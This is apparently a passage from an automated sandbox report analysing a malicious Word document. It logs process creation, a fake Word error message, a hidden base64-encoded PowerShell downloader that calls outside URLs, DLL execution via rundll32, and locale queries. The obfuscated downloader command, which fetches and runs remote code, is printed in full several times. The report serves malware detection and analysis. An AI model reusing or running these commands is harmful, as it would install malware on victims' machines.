[ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	7_2_10016021
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	7_2_10018026
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	7_2_10018090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	7_2_100178A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_100150C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_10016A2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,	7_2_10017A6A
